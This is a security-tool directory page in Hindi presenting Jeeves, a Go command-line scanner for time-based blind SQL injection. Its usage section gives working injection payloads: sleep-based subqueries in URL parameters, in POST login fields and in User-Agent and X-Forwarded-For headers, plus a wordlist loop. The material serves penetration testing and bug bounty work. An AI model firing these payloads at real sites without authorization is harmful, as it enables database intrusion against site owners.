Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Jeeves — समय-आधारित ब्लाइंड SQL इंजेक्शन पहचान उपकरण, रीकॉन और बग बाउंटी के लिए। एकल URL या सूचियाँ स्वीकार करता है, कस्टम हेडर, प्रॉक्सी और स्वचालित भेद्यता स्कैनिंग के लिए POST डेटा का समर्थन करता है। | Kitploit
उपकरण/GitHubGitHub/ferreiraklet/jeeves
भेद्यता स्कैनरवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubferreiraklet/jeeves

Jeeves

समय-आधारित ब्लाइंड SQL इंजेक्शन पहचान उपकरण, रीकॉन और बग बाउंटी के लिए। एकल URL या सूचियाँ स्वीकार करता है, कस्टम हेडर, प्रॉक्सी और स्वचालित भेद्यता स्कैनिंग के लिए POST डेटा का समर्थन करता है।

रिपॉजिटरी देखें
21550444 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

made-with-Go

Jeeves


उपयोग • स्थापना

Jeeves पुनर्जाँच (recon) के माध्यम से टाइम-बेस्ड ब्लाइंड SQL इंजेक्शन खोजने के लिए बनाया गया है।

सामग्री:

  • स्थापना
  • उपयोग
    • हेडर जोड़ना
    • प्रॉक्सी का उपयोग
    • POST अनुरोध करना
    • उपयोग के अन्य तरीके

- स्थापना और आवश्यकताएँ:

Jeeves 💀 स्थापित करना

root@kitploit:~
$ go install github.com/ferreiraklet/Jeeves@latest

या

root@kitploit:~
$ git clone https://github.com/ferreiraklet/Jeeves.git
$ cd Jeeves
$ go build jeeves.go
$ chmod +x jeeves
$ ./jeeves -h

- उपयोग और स्पष्टीकरण:

आपकी पुनर्जाँच प्रक्रिया में, आपको ऐसे एंडपॉइंट मिल सकते हैं जो SQL इंजेक्शन के प्रति संवेदनशील हो सकते हैं। उदाहरण: https://redacted.com/index.php?id=1

एकल URL

root@kitploit:~
echo 'https://redacted.com/index.php?id=your_time_based_blind_payload_here' | jeeves -t payload_time
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(10)))v)" | jeeves -t 10

--payload-time में आपको पेलोड में उल्लिखित समय का उपयोग करना होगा।


सूची से

cat targets | jeeves --payload-time 5

हेडर जोड़ना

सिंटैक्स पर ध्यान दें! समान होना चाहिए =>

root@kitploit:~
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 -H "Testing: testing;OtherHeader: Value;Other2: Value"

प्रॉक्सी का उपयोग

root@kitploit:~
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 --proxy "http://ip:port"
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 -p "http://ip:port"

प्रॉक्सी + हेडर =>

root@kitploit:~
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5 --proxy "http://ip:port" -H "User-Agent: xxxx"

POST अनुरोध

POST अनुरोध (लॉगिन फॉर्म आदि) के माध्यम से डेटा भेजना

सिंटैक्स पर ध्यान दें! समान होना चाहिए! ->

root@kitploit:~
echo "https://example.com/Login.aspx" | jeeves -t 10 -d "user=(select(0)from(select(sleep(5)))v)&password=xxx"
echo "https://example.com/Login.aspx" | jeeves -t 10 -H "Header1: Value1" -d "username=admin&password='+(select*from(select(sleep(5)))a)+'" -p "http://yourproxy:port"

उपयोग के अन्य तरीके

आप Jeeves का उपयोग अन्य उपकरणों जैसे gau, gauplus, waybackurls, qsreplace और bhedak के साथ कर सकते हैं, इसकी शक्ति का लाभ उठाने के लिए।


कमांड लाइन फ़्लैग:

root@kitploit:~
 उपयोग:
 -t, --payload-time,  पेलोड का समय
 -p, --proxy          ट्रैफ़िक को प्रॉक्सी पर भेजें
 -c                   समवर्ती सेट करें, डिफ़ॉल्ट 25
 -H, --headers        कस्टम हेडर
 -d, --data           POST अनुरोध डेटा के साथ भेजना
 -h                   यह सहायता संदेश दिखाएँ

SQL पेलोड वर्डलिस्ट के साथ उपयोग

root@kitploit:~
cat sql_wordlist.txt | while read payload;do echo http://testphp.vulnweb.com/artists.php?artist= | qsreplace $payload | jeeves -t 5;done

हेडर में परीक्षण

root@kitploit:~
echo "https://target.com" | jeeves -H "User-Agent: 'XOR(if(now()=sysdate(),sleep(5*2),0))OR'" -t 10
echo "https://target.com" | jeeves -H "X-Forwarded-For: 'XOR(if(now()=sysdate(),sleep(5*2),0))OR'" -t 10

पेलोड क्रेडिट: https://github.com/rohit0x5

नोट:

  • रीडायरेक्ट का पालन नहीं करता है। यदि स्थिति कोड 200 से भिन्न है, तो "Need Manual Analisys" लौटाता है।
  • Jeeves HTTP प्रोबिंग नहीं करता, वह उन URL पर अनुरोध नहीं कर सकता जिनमें प्रोटोकॉल (http://, https://) नहीं है।

यह परियोजना केवल शैक्षिक और बग बाउंटी उद्देश्यों के लिए है! मैं किसी भी अवैध गतिविधि का समर्थन नहीं करता!।

यदि प्रोग्राम में कोई त्रुटि है, तो तुरंत मुझसे संपर्क करें।

कृपया, इन्हें भी देखें =>

Nilo - जाँचता है कि URL का स्थिति 200 है या नहीं

SQLMAP

Blisqy हेडर टाइम-बेस्ड SQLI

टूल डाउनलोड करें